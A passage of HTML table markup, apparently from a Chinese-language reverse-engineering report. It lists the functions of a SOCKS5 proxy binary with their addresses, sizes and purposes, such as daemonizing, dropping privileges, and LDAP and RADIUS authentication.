none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4230144</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">168</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">接受客户端连接</span></font></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5MakeDaemon</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4230672</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">61</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">守护进程化（</span></font><span leaf="">fork→setsid→fork→chdir→umask）</span></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5UIDSet</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4230736</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">177</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">降权操作（</span></font><span leaf="">getpwnam→setgid→initgroups→setuid）</span></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DirectoryQuery</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4254928</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">3455</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">LDAP 目录查询认证</span></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">DirectoryCheck</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4258384</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">514</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">目录认证检查</span></font></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5RadiusAuth</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4261552</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">2741</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">RADIUS 认证</span></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5RadiusAcct</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4258912</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">2633</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">RADIUS 计费</span></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5GetIf</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4234656</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">710</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">获取网络接口信息</span></font></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5GetRange</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4233056</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">255</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">解析</span></font><span leaf=""> IP 范围</span></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5GetNetmask</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4233312</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">180</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">解析网络掩码</span></font></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5StrHash</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">0x4232992</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">57</span></span></p></td><td data-colwidth="440" width="440" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">字符串哈希</span></font></span></p></td></tr><tr><td data-colwidth="205" width="205" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">S5Debug* 系列</span></span></p></td><td data-colwidth="123" width="123" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">-</span></span></p></td><td data-colwidth="84" width="84" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 